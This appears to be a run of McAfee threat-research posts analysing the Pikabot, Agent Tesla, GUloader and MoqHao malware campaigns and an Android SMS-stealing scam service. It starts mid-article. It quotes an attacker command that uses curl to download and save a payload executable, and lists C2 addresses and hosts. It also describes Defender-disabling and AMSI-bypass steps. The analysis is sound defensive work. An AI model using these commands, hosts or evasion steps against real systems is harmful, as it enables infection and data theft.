When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.
Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.
Commandline:
‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’
McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.
Figure 5. JS file
Figure 6. EXE file
In this campaign, Malware leverages the MonikerLink bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.
Infection Chain:
EML ->SMB share link->.zip->.exe
Spam Email:
Figure 7. Spam email with SMB share link
SMB Share link: file://newssocialwork.com/public/FNFY.zip
In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.
Figure 8. EXE file
Figure 9. Face in Excel
Infection Chain:
.zip >.xls > .js > .dll
This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”
Upon hovering over the “Open” button, we can notice an SMB file share link -file:///\\85.195.115.20\share\reports_02.15.2024_1.js.
Bundled files in Excel:
Figure 10. Bundled files inside Excel
The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.
The hyperlink is present in the below relationship file.
Figure 11. XML relationship file
Content of relationship file:
Figure 12. xl/drawings/_rels/drawing1.xml.rels
Code of JS file:
Figure 13. Obfuscated javascript code
The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.
Figure 14. Calling regsvr32.exe
The downloaded DLL payload is executed by regsvr32.exe.
In this campaign, McAfee blocks the XLSX file.
Figure 15. XLSX file
In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.
Infection Chain:
.zip>.jar>.dll
On extraction, the below files are found inside the jar file.
Figure 16. Extraction of JAR file
The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.
The jar file on execution loads the file “163520” as a resource and drops it as .png to the %temp% location which is the payload DLL file.
Figure 17. Payload with .png extension
Following this, java.exe initiates the execution of regsvr32.exe to run the payload.
In this campaign, McAfee blocks both the JAR and DLL files.
Figure 18. JAR file
Figure 19. DLL file
Due to a relatively high entropy of the resource section, the sample appears packed.
Figure 20. Loader Entropy
Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.
Figure 21. Decryption Loop
Figure 22. Decrypted to get the PE file
Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”
Figure 23. Injection with ctfmon.exe
To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.
Figure 24. Mutex
Malware collects the data from the victim machine and sends it to the C2 server.
Figure 25. Network activity
PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).
Figure 26. Network activity
Figure 27. C2 communication
C2 found in the payload are:
178.18.246.136:2078
86.38.225.106:2221
57.128.165.176:1372
File Type | SHA 256 |
ZIP | 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a |
HTML | 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82 |
ZIP | 4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd |
JS | 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849 |
EXE | 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 |
ZIP | f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512 |
EXE | aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1 |
XLSX | bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5 |
JS | 49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72 |
ZIP | d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04 |
JAR | d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4 |
DLL | 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e |
The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.
Authored by ZePeng Chen and Wenfeng Yu
McAfee Mobile Research Team has observed an active scam malware campaign targeting Android users in India. This malware has gone through three stages. The first one is the development stage, from March 2023 to July 2023, during which a couple of applications were created each month. The second is the expansion stage, from August 2023 to October 2023, during which dozens of applications were created each month. The third is the active stage, from September 2023 to the present, during which hundreds of applications were created each month. According to McAfee’s detection telemetry data, this malware has accumulated over 800 applications and has infected more than 3,700 Android devices. The campaign is still ongoing, and the number of infected devices will continue to rise.
Malware developers create phishing pages for scenarios that are easy to deceive, such as electricity bill payments, hospital appointments, and courier package bookings. Developers use different applications to load different phishing pages, which are eventually sold to scammers. In our research, more than 100 unique phishing URLs and more than 100 unique C2 URLs are created in these malicious applications. It means that each scammer can carry out scam activities independently.
Scammers use malware to attack victims. They typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services. This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. There was a report where an Indian woman downloaded malware from a link in WhatsApp and about ₹98,000 was stolen from her. We were not able to confirm if is the same malware, but it is just one example of how these malicious applications can be distributed directly via WhatsApp.
The attack scenario appears credible, many victims do not doubt the scammers’ intentions. Following the instructions provided, they download and installed the app. In the app, victims are induced to submit sensitive information such as personal phone numbers, addresses, bank card numbers, and passwords. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account.
The malware not only steals victims’ bank account information via phishing web pages but also steals SMS messages on victims’ devices. Because of the stolen information, even if the bank account supports OTP authentication, the scammer can transfer all the funds. The malware uses legitimate platforms to deploy phishing pages to make it appear more trustworthy to evade detection.
McAfee Mobile Security detects this threat as Android/SmsSpy. For more information, and to get fully protected, visit McAfee Mobile Security.
We discovered that these phishing pages and malware were being sold as a service by a cyber group named ELVIA INFOTECH. A distinct difference between this malware and others is that the apps sold have a valid expiration date. When the expiration date is reached, some application links will redirect to a payment notification page. The notification is clearly to request the purchaser to pay a fee to restore the use of the malware.
Figure 1. Payment notification.
We also discovered that the cybercriminal group was selling malware in a Telegram group. Based on these observations, we believe that ELVIA INFOTECH is a professional cybercriminal organization engaged in the development, maintenance, and sale of malware and phishing websites.
Figure 2. Telegram Group conversation.
This malware has been maintained and recently updated, and hundreds of malicious applications were created. They like to use the file names such as “CustomerSupport.apk”, “Mahavitaran Bill Update.apk”, “Appointment Booking.apk”, “Hospital Support.apk”, “Emergency Courier.apk” and the application names such as “Customer Support”, “Blue Dart”, “Hospital Support”,” Emergency Courier” to trick victims, below are some applications’ names and icons.
Figure 3. Some applications’ names and icons
Not only do they pretend to be “Customer Support”, but they also pretend to be popular courier companies like “Blue Dart” in India, but they also target utility companies like “Mahavitaran” (Power Corporation of India).
Once victims click the fake icon, the application will be launched and start to attack victims.
1. Loading Phishing Pages
The phishing page loads once the application is launched. It will disguise itself as a page of various legitimate services, making victims believe that they are visiting a legitimate service website. Here, victims are tricked into providing sensitive information such as name, address, phone number, bank card number, and password. However, once submitted, this information falls into the hands of scammers, allowing them to easily access and control the victim’s bank account.
We found that most of this attack campaign impersonated carrier package delivery companies.
Figure 4. Phishing Pages Load Once App Launches
The malware developers also designed different phishing pages for different applications to deceive victims in different scenarios that exploit electricity bill payments and hospital appointments.
Figure 5. Hospital appointment and Electricity Bill Phishing Pages
2. Stealing One-Time Passwords via SMS message
As a core design of this malware, the application requests permissions to allow it to send and view SMS messages once it launches.
Figure 6. Request SMS permissions.
If victims click the “Allow” button, the malware starts a background service that secretly monitors users’ text messages and forwards them to a number which is from C2 server.
Figure 7. Forward phone number from C2 server
This step is crucial for the scam process, as many banks send a one-time password (OTP) to the customer’s phone for transaction verification. Using this method, the scammers can obtain these OTPs and successfully complete bank transactions.
This malicious app and the developers behind it have emerged rapidly in India from last year to now, purposefully developing and maintaining malware, and focusing on deploying well-designed phishing websites through legitimate platforms. The group secretly promotes and sells its malware through social media platforms, making the spread of the malware more subtle and difficult to detect. This tactic resulted in an even more severe malware outbreak, posing an ongoing and serious threat to the financial security of Indian users.
Malware campaigns are very persistent and using multiple different applications on different websites can trick many victims into installing these applications and providing their private and personal information, which can then be used to commit fraud. In this environment, ordinary users in India face huge cybersecurity challenges. Therefore, users need to remain vigilant and cautious when dealing with any electronic communications or application download requests that appear legitimate but may contain malware. We strongly recommend users install security software on their devices and always keep it up to date. By using McAfee Mobile Security products, users can further protect their devices and reduce the risks associated with this type of malware, providing a more secure experience.
Indicators of Compromise (IOCs)
SHA256 hash List:
Phishing URLs:
C2 Server URLs:
The post Android Phishing Scam Using Malware-as-a-Service on the Rise in India appeared first on McAfee Blog.
Authored by Yashvi Shah and Preksha Saxena
McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently harmless emails, particularly within the PDF file attachments accompanying them. The subsequent trend observed in the past three months through McAfee telemetry pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.
Figure 1: Rise in PDF malware
Upon implementing Microsoft‘s macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an enticing avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.
This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the dissemination of the ultimate payload. In the outdated and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which facilitates process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:
Figure 2: Infection Chain
Firstly, we shall address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.
In a recent attack, a file named “Booking.com-1728394029.pdf” was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, “Lettore non è compatibile!”, which translates to “Player is not compatible,” as depicted in the provided Figure below.
Figure 3: Face of PDF attachment
Upon examining the internal structure of the PDF (Figure 4), it was discovered that within one of the seven objects, some hex data and an embedded URL were identified. The URL highlighted in the red box “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly’s dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.
This URL is intended to connect to https://bio0king[.]blogspot[.]com
Figure 4: Embedded data in PDF
The text in yellow highlighted in Figure 4, appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:
Figure 5: ASCII Conversion
This is the reason behind the prompt observed in Figure 3, displaying the same alert message upon opening the PDF document.
After clicking “OK,” another prompt appeared from Adobe Player, cautioning about the connection established to the address mentioned in the prompt i.e. “bit.ly”.
Figure 6: Connection to embedded URL
Upon granting permission for redirection, the user is directed to the website “https://bio0king[.]blogspot[.]com”. Thus, an attempt is made to disguise itself as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.
Figure 7: Connection to disguised website
Upon accessing the website, it was observed that a JavaScript file named “Booking.com-1728394029.js” was promptly downloaded. The js file was intentionally named identically to the PDF file in an effort to deceive users into opening it.
Figure 8: Prompt of JS file download
Immediately upon initiating the download, redirection is triggered to the legitimate Booking.com website, aiming to prevent users from detecting any suspicious activity. The downloaded file is stored in the Downloads folder on the user’s system.
Figure 9: JS file downloaded
The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.
Figure 10: JS file content
Upon executing the JavaScript, the following process tree was observed:
Figure 11: Process tree
Command line:
Upon decoding and executing “Booking.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”
Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com/////////////////////////atom.xml, followed by executing the file using Invoke-Expression (iex). In this instance, the attackers attempted to obfuscate the Invoke-Expression (iex) command by using the replace command within the PowerShell command line. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.
The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1, measuring approximately 5.5 MB in size. The figure below depicts the content of the file:
Figure 12: Content of .ps1 file
Let’s begin deciphering this script shown in Figure 11 with reference:
The Red marked content at the top of the script indicates that it will terminate several specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the final payload into one of these legitimate binaries. Furthermore, the script creates a directory at “C:\ProgramData\MINGALIES” for potential future utilization.
The Blue marked content within the script represents the decryption function, labeled as “asceeeeeeeeeeeeeeee”. This function is subsequently employed to decrypt various variables within the script.
The Green marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.
For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in Yellow for clarity and emphasis.
Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, variable 3, named “Phudigum”, is defined in the script. Following that, the script decrypts variable 3 and executes the obtained decoded data using the Invoke-Expression (IEX) command.
The content of the decoded variable 3 is as follows:
Figure 13: Variable 3 after decryption
The code first bypasses the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system’s memory and sets global error action preferences to silently continue, suppressing any errors. It checks if a type named AMSIReaper exists and if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.
Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to alter various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Furthermore, the script tries to modify registry settings associated with User Account Control (UAC) and disable the Windows Firewall, further weakening the system’s defenses. Lastly, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script’s malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system’s security and potentially enable further malicious activities.
The subsequent instruction in Figure 11 involves decrypting variable 2, labeled as “bulgumchupitum,” utilizing the decryption function “asceeeeeeeeeeeeeeee.” And the same is executed by Invoke-Expression (IEX) command. Following is the decoded content of variable 2:
Figure 14: Variable 2 after decryption
The content obtained after decrypting variable 2 holds significant importance. The highlighted section in Red does the following:
The next section marked Blue in Figure 13, does the following:
Figure 15: Data 1
Data 1 comprises a .NET DLL file. As previously indicated, the script invokes the method ‘C’ from the type named ‘A.B’. Despite the high level of obfuscation in the file shown in Figure 15, the presence of method ‘C’ can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to framework executables and data are being passed (highlighted within the red box).
Figure 16: Data 1 dll
This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe process. The following figure shows the configuration of data2. The depicted configuration of data2 disguises it as a legitimate McAfee package file shown in Figure 16. However, it lacks a valid certificate, indicating its fraudulent nature.
Figure 17: Data2
The executable file exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.
Figure 18: Data2 exe
The attackers have intricately orchestrated the obfuscation process. Each string undergoes decryption through a series of instructions, with specific parameters being passed to obtain the deciphered content. This meticulous approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 18, through reverse engineering, we can observe how it begins querying the browser for information. The highlighted instruction is the one which after decrypting gives the path of the Opera browser.
Figure 19: Fetching browser information
The following ProcMon logs show all the broswers the malware queried:
Figure 20: Procmon logs of browsers(1)
Figure 21: Procmons logs for browsers(2)
In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Otlook profiles, etc.
Figure 22: Credentials
Through debugging the code, we were able to uncover the domain it was utilizing for exfiltration. The following figure shows the URL used for exfiltration:
Figure 23: Domain obtained
The same was evident from Procmon logs shown in the Figure below:
Figure 24: Procmon logs of Connection for exfiltration
The DNS record of IP address 149.154.167.220 belongs to Telegram messenger.
Figure 25: DNS record
AgentTesla leverages Telegram bots for data exfiltration due to several advantageous factors. Firstly, Telegram provides robust end-to-end encryption, ensuring the security of transmitted data. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram’s user-friendly interface simplifies communication processes for both attackers and their command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious compared to other channels, aiding in evading detection. Moreover, Telegram’s infrastructure resilience makes it a reliable option for maintaining communication channels even amidst takedown efforts.
Overall, the combination of security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla’s data exfiltration tactics. And to achieve this, it establishes contact with the respective domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.
Figure 26: TelegramBot for exfiltration
In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.
Moving forward with atom.ps1 (Figure 11), the next is variable 4, labeled as “koaskodkwllWWW”, and is decrypted using the function “asceeeeeeeeeeeeeeee”. Upon decryption, the content is decoded as follows:
Figure 27: Variable 4 decoded
This script establishes persistence by:
Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:
Figure 28: Persistence instructions
Now, after substituting the values:
We inspected registry entries and scheduled task entries for cross-verification. And the script did as directed:
Figure 29: Registry entry for Persistence
Figure 30: Task Scheduler
Figure 31: Procmon logs for persistence
In summary, the script is configured to execute again after 213 minutes, creating a Run entry named “chromeupdateri” and fetching the atom.ps1 file again from “htljan62024.blogspot.com//////////atom.xml”.
Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.
Figure 32: Prompt for embedded javascript
Upon examining the streams of the PDF, we discovered the identical script embedded within the document:
Figure 33: Embedded javascript in PDF
After the launch of MSHTA, an instance of PowerShell is invoked, initiating process injection into Regsvcs.exe and injection of AgentTesla. Consequently, utilizing an old and unpatched version of Acrobat Reader, interaction with the PDF is unnecessary; mere opening of the PDF file results in system infection by the malware.
The chain of events initiates with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL file, which injects AgentTesla payload into legitimate processes to evade detection. The malware communicates with command-and-control servers, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of malicious JavaScript, leading to the injection of AgentTesla malware via PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming the exploitation of vulnerabilities without requiring user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, posing significant challenges for detection and mitigation efforts.
Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:
8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242 | |
Javascript | 3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b |
ps1 file | db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429 |
dll | 5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee |
exe | dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e |
IPv4 | 149.154.167.220 |
URL | http://htloctmain25.blogspot[.]com/atom.xml |
URL | https://bio0king[.]blogspot[.]com |
Table 1: Indicators of Compromise
The post Rise in Deceptive PDF: The Gateway to Malicious Payloads appeared first on McAfee Blog.
Authored by: Vignesh Dhatchanamoorthy
In the ever-evolving landscape of cybersecurity threats, staying ahead of malicious actors requires a deep understanding of their tactics and tools. Enter GUloader, a potent weapon in the arsenal of cybercriminals worldwide. This sophisticated malware loader has garnered attention for its stealthy techniques and ability to evade detection, posing a significant risk to organizations and individuals.
One of GUloader’s distinguishing features is its utilization of evasion techniques, making it particularly challenging for traditional security measures to detect and mitigate. Through polymorphic code and encryption, GUloader can dynamically alter its structure, effectively masking its presence from antivirus software and intrusion detection systems. This adaptability enables GUloader to persistently infiltrate networks and establish footholds for further malicious activity.
McAfee Labs has observed a recent GUloader campaign being distributed through a malicious SVG file delivered via email.
The SVG (Scalable Vector Graphics) file format is a widely used vector image format designed for describing two-dimensional vector and mixed vector/raster graphics in XML. One of the key features of SVG files is their support for interactivity and animation, achieved through JavaScript and CSS.
Modern web browsers such as Google Chrome, Mozilla Firefox, and Microsoft Edge have built-in support for rendering SVG files. When you open an SVG file in Chrome or Firefox, the browser renders the vector graphics using its built-in SVG rendering engine. This engine interprets the XML-based SVG code and displays the image accordingly on the web page.
Browsers treat SVG files as standard web content and handle them seamlessly within their browsing environments.
Figure 1: Infection chain
The execution process begins with the opening of an SVG file from an email attachment. This action triggers the browser to download a ZIP file. Within this ZIP file is a WSF (Windows Script File), acting as the conduit for the subsequent stage. Upon execution of the WSF, wscript calls the PowerShell command to establish a connection with a malicious domain and execute the hosted content. This content includes shellcode injected into the MSBuild application, facilitating further malicious actions.
Figure 2: Process Tree
A recipient receives a spam email that contains malware embedded in archived attachments. The attachment contains a malicious SVG file named “dhgle-Skljdf.svg”
Figure 3: Spam Email
JavaScript that was smuggled inside of the SVG image contained the entire malicious zip archive. When the victim opened the attachment from the email the smuggled JavaScript code inside the SVG image created a malicious zip archive, and then presented the user with a dialog box to decrypt and save the file.
Figure 4: Saving file prompt
The SVG file utilizes a Blob object that contains the embedded zip file in base64 format. Subsequently, the zip file is dropped via the browser when accessed.
Figure 5: SVG file code
Inside the zip file, there is an obfuscated WSF (Windows Script File). The WSF script employs several techniques to make analysis quite difficult.
Figure 6: Obfuscated WSF Script
It invokes PowerShell to establish a connection with a malicious domain, subsequently executing the hosted content retrieved from it.
Encoded PowerShell
Figure 7: Encoded PowerShell code
After Decoding
Figure 8: Decoded PowerShell code
URL: hxxps://winderswonders.com/JK/Equitably.mix
The URL hosts base64-encoded content, which, after decoding, contains shellcode and a PowerShell script.
Hosted Content
Figure 9: Hosted Base64 content
After decoding Base64
Figure 10: Decoded Base64 content
The above PowerShell script attempts to load the shellcode into the legitimate MSBuild process using the Process Hollowing technique.
After injection, the shellcode executes anti-analysis check then it modifies the Registry run key to achieve persistence.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
The final stage uses the injected shellcode to download and execute the final malicious executable. GuLoader can also download and deploy a wide range of other malware variants.
File | SHA256/URL |
66b04a8aaa06695fd718a7d1baa19386922b58e797634d5ac4ff96e79584f5c1 | |
SVG | b20ea4faca043274bfbb1f52895c02a15cd0c81a333c40de32ed7ddd2b9b60c0 |
WSF | 0a196171571adc8eb9edb164b44b7918f83a8425ec3328d9ebbec14d7e9e5d93 |
URL | hxxps://winderswonders[.]com/JK/Equitably[.]mix |
The post GUloader Unmasked: Decrypting the Threat of Malicious SVG Files appeared first on McAfee Blog.
Authored by Dexter Shin
MoqHao is a well-known Android malware family associated with the Roaming Mantis threat actor group first discovered in 2015. McAfee Mobile Research Team has also posted several articles related to this malware family that traditionally targets Asian countries such as Korea and Japan.
Recently McAfee Mobile Research Team found that MoqHao began distributing variants using very dangerous technique. Basically, the distribution method is the same. They send a link to download the malicious app via the SMS message. Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution. While the app is installed, their malicious activity starts automatically. This technique was introduced in a previous post but the difference is that this dangerous technique is now being abused by other well-known active malware campaigns like MoqHao. We have already reported this technique to Google and they are already working on the implementation of mitigations to prevent this type of auto-execution in a future Android version. Android users are currently protected by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play. McAfee Mobile Security detects this threat as Android/MoqHao.
MoqHao is distributed via phishing SMS messages (also known as Smishing). When a user receives an SMS message containing a malicious link and clicks it, the device downloads the malicious application. Phishing messages are almost the same as in previous campaigns:
Figure 1. Smishing message impersonating a notification from a courier service.
One noticeable change is that they now use URL shortener services. If the malware authors use their own domain, it can be quickly blocked but if they use legitimate URL shortener services, it is difficult to block the short domain because it could affect all the URLs used by that service. When a user clicks on the link in the message, it will be redirected to the actual malicious site by the URL shortener service.
As mentioned at the beginning, this variant behaves differently from previous ones. Typical MoqHao must be launched manually by the user after it is installed but this variant launches automatically after installation without user interaction:
Figure 2. Differences between typical MoqHao and Modern MoqHao
We explained this auto-execution technique in detail in a previous post but to briefly summarize it here, Android is designed so when an app is installed and a specific value used by the app is set to be unique, the code runs to check whether the value is unique upon installation. This feature is the one that is being abused by the highly active Trojan family MoqHao to auto-execute itself without user interaction. The distribution, installation, and auto-execution of this recent MoqHao variant can be seen in the following video:
On the other hand, this recent MoqHao variant uses Unicode strings in app names differently than before. This technique makes some characters appear bold, but users visually recognize it as “Chrome”. This may affect app name-based detection techniques that compare app name (Chrome) and package name (com.android.chrome):
Figure 3. App name using Unicode strings.
Additionally, they also use social engineering techniques to set malicious apps as the default SMS app. Before the settings window appears, they show a message telling you to set up the app to prevent spam, but this message is fake:
Figure 4. Fake message using social engineering techniques.
Also, the different languages used in the text associated with this behavior suggests that, in addition to Japan, they are also targeting South Korea, France, Germany, and India:
Figure 5. Fake messages designed to target different countries.
After the initialization of the malware is completed, it will create a notification channel that will be used to display phishing messages:
Figure 6. Create a notification channel for the next phishing attack.
The malware checks the device’s carrier and uses this notification to send phishing messages accordingly to trick users into clicking on them. MoqHao gets the phishing message and the phishing URL from Pinterest profiles.
Figure 7. Phishing message and URL in Pinterest profile
If the phishing string is empty, MoqHao will use the phishing message in the code:
Figure 8. Phishing notification code for each carrier
This variant also connects to the C2 server via WebSocket. However, it has been confirmed that several other commands have been added in addition to the commands introduced in the previous post:
Command | Description |
getSmsKW | Send all SMS messages to C2 server |
sendSms | Send SMS messages to someone |
setWifi | Enable/disable Wifi |
gcont | Send whole contacts to C2 server |
lock | Store Boolean value in “lock” key in SharedPreferences |
bc | Check SIM state |
setForward | Store String value in “fs” key in SharedPreferences |
getForward | Get String value in “fs” key in SharedPreferences |
hasPkg | Check specific package installed on device |
setRingerMode | Set Sound/Vibrate/Silent mode |
setRecEnable | Set Vibrate/Silent mode according to SDK version |
reqState | Send device information (Network, Power, MAC, Permission) to C2 server |
showHome | Emulate Home button click |
getnpki | Send Korean Public Certificate (NPKI) to C2 server |
http | Send HTTP requests |
call | Call a specific number with Silent mode |
get_apps | Get list of installed packages |
ping | Check C2 server status |
getPhoneState | Get unique information such as IMEI, SIM number, Android ID, and serial number |
get_photo | Send all photos to C2 server |
MoqHao malware family is an active malware that has been around for years. Although many years have passed, they are using more and more different ways to hide and reach users. We are seeing a much higher number of C2 commands than in previous, the active use of legitimate sites like Pinterest to store and update phishing data, and code with the potential to target Asian countries like Japan and South Korea, as well as countries like France, Germany, and India. Moreover, we expect this new variant to be highly impactful because it infects devices simply by being installed without execution.
It is difficult for general users to find fake apps using legitimate icons and application names, so we recommend users to install secure software to protect their devices. For more information, visit McAfee Mobile Security.
SHA256 | Application Name | Package Name |
2576a166d3b18eafc2e35a7de3e5549419d10ce62e0eeb24bad5a1daaa257528 | chrome | gb.pi.xcxr.xd |
61b4cca67762a4cf31209056ea17b6fb212e175ca330015d804122ee6481688e | chrome | malmkb.zdbd.ivakf.lrhrgf |
b044804cf731cd7dd79000b7c6abce7b642402b275c1eb25712607fc1e5e3d2b | chrome | vfqhqd.msk.xux.njs |
bf102125a6fca5e96aed855b45bbed9aa0bc964198ce207f2e63a71487ad793a | chrome | hohoj.vlcwu.lm.ext |
e72f46f15e50ce7cee5c4c0c5a5277e8be4bb3dd23d08ea79e1deacb8f004136 | chrome | enech.hg.rrfy.wrlpp |
f6323f8d8cfa4b5053c65f8c1862a8e6844b35b260f61735b3cf8d19990fef42 | chrome | gqjoyp.cixq.zbh.llr |
The post MoqHao evolution: New variants start automatically right after installation appeared first on McAfee Blog.
The explosive growth of Generative AI has sparked many questions and considerations not just within tech circles, but in mainstream society in general. Both the advancement of the technology, and the easy access means that virtually anyone can leverage these tools, and much of 2023 was spent discovering new ways that Generative AI could be used to solve problems or better our lives.
